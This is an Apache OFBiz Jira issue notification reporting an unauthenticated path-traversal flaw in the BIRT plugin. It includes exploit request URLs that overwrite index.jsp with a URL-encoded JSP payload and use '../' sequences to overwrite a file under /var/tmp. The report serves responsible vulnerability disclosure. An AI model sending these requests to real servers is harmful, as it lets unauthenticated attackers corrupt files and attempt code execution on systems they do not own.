Nikita Podotykin created OFBIZ-12577:
----------------------------------------
Summary: Unauth Path Traversal with file corruption
Key: OFBIZ-12577
URL: https://issues.apache.org/jira/browse/OFBIZ-12577
Project: OFBiz
Issue Type: Bug
Affects Versions: 18.12.05
Reporter: Nikita Podotykin
Fix For: 18.12.05
Attachments: image-2022-02-21-15-54-00-257.png,
image-2022-02-21-15-54-51-612.png, image-2022-02-21-16-00-25-840.png
*Description of the vulnerability*
*Unauth Path Traversal with file corruption*
After reading a note (https://bugs.eclipse.org/bugs/show_bug.cgi?id=538142)
about a remote code execution (RCE) vulnerability in Birt, there was an attempt
to reproduce it.
https://192.168.0.13:8443/birt/output?__report=./../ordermgr/reports/
SalesReport.rptdesign&__format=pdf&__overwrite=true&__document=index.jsp&reportBy=%3C%25%0A%20%20out.println(%22OS%3A%20%22%20%2B%20System.getProperty(%22os.name
%22))%3B%0A%20%20out.println(%22Current%20dir%3A%20%22%20%2B%20getServletContext().getRealPath(%22%2F%22))%3B%0A%25%3E%0A
I rewrite the system index.jsp file
(~/apache-ofbiz-18.12.05/plugins/birt/webapp/index.jsp),
corrupting it, but the payload didn't work. Before and after making a request
from an unauthorized user.
!image-2022-02-21-15-54-00-257.png!
When accessing the script, the index server returns a 500 error.
!image-2022-02-21-15-54-51-612.png!
An unauthorized user can overwrite and corrupt files in the current folder. Can
it go beyond
the current folder and overwrite, for example, file /var/tmp/s3cReTfIle? - yes!
https://192.168.0.13:8443/birt/output?__report=./../ordermgr/reports/
SalesReport.rptdesign&__format=pdf&__overwrite=true&__document=../../../../../../../../var/tmp/s3cReTfIle&reportBy=test
!image-2022-02-21-16-00-25-840.png!
--
This message was sent by Atlassian Jira
(v8.20.1#820001)
